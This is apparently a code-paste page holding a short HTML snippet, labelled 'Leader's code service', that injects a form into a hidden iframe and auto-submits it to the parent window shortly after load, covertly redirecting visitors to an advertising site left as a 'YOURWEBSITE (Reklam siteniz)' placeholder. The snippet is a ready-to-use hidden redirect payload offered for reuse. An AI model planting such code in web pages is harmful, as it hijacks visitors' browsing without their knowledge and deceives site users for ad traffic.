fork(7) download
  1. //Leader's code service//
  2.  
  3. <html>
  4. <body>
  5. <script>
  6. function go(){
  7. window.frames[0].document.body.innerHTML='<form target="_parent" action="YOURWEBSITE (Reklam siteniz)"></form>';
  8. window.frames[0].document.forms[0].submit()
  9. }
  10. </script>
  11. <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
  12. </body>
  13. </html>
  14.  
  15. //Leader's code service//
Not running #stdin #stdout 0s 0KB
stdin
Standard input is empty
stdout
Standard output is empty